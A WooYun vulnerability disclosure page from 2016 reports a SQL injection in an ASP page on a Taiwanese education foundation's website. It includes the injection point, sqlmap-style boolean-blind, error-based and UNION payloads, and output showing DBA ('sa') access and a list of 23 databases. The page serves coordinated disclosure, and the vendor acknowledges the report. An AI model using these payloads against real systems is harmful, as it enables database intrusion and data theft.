当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0169800

漏洞标题:俊逸文教基金會www站点sql注入#2(dba+20裤)(臺灣地區)

相关厂商:俊逸文教基金會

漏洞作者: 路人甲

提交时间:2016-01-19 17:41

修复时间:2016-03-06 14:18

公开时间:2016-03-06 14:18

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:11

漏洞状态:已交由第三方合作机构(Hitcon台湾互联网漏洞报告平台)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-01-19: 细节已通知厂商并且等待厂商处理中
2016-01-21: 厂商已经确认,细节仅向厂商公开
2016-01-31: 细节向核心白帽子及相关领域专家公开
2016-02-10: 细节向普通白帽子公开
2016-02-20: 细节向实习白帽子公开
2016-03-06: 细节向公众公开

简要描述:

俊逸文教基金會www站点sql注入#2(dba+20裤)

详细说明:

注入点:

http://**.**.**.**/e-go/heart_detail.asp?HidDID=21


Place: GET
Parameter: HidDID
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: HidDID=21 AND 2611=2611
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING cl
Payload: HidDID=21 AND 8857=CONVERT(INT,(CHAR(58)+CHAR(98)+CHAR(101)+CH
0)+CHAR(58)+(SELECT (CASE WHEN (8857=8857) THEN CHAR(49) ELSE CHAR(48) END)
R(58)+CHAR(97)+CHAR(122)+CHAR(120)+CHAR(58)))
Type: UNION query
Title: Generic UNION query (NULL) - 12 columns
Payload: HidDID=21 UNION ALL SELECT CHAR(58)+CHAR(98)+CHAR(101)+CHAR(11
AR(58)+CHAR(120)+CHAR(98)+CHAR(106)+CHAR(78)+CHAR(79)+CHAR(82)+CHAR(100)+CH
7)+CHAR(79)+CHAR(86)+CHAR(58)+CHAR(97)+CHAR(122)+CHAR(120)+CHAR(58), NULL,
NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL--
---
[10:48:27] [INFO] testing Microsoft SQL Server
[10:48:28] [INFO] confirming Microsoft SQL Server
[10:48:31] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008
web application technology: ASP.NET, Microsoft IIS 7.5, ASP
back-end DBMS: Microsoft SQL Server 2008
[10:48:31] [INFO] fetching current user
current user: 'sa'


dba权限

[10:49:11] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008
web application technology: ASP.NET, Microsoft IIS 7.5, ASP
back-end DBMS: Microsoft SQL Server 2008
[10:49:11] [INFO] testing if current user is DBA
current user is DBA: 'True'


available databases [23]:
[*] BCST
[*] E5912429_ego
[*] E5912429_pain
[*] FourSeason
[*] KD
[*] LD
[*] liposome
[*] master
[*] model
[*] msdb
[*] ntusm
[*] Oral99
[*] PD
[*] PenMen
[*] People
[*] PeopleMove
[*] PeopleMove2013
[*] PPAT2010
[*] Register
[*] screening
[*] screening99
[*] tempdb
[*] vhost64494


漏洞证明:

修复方案:

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:17

确认时间:2016-01-21 23:50

厂商回复:

感謝通報

最新状态:

暂无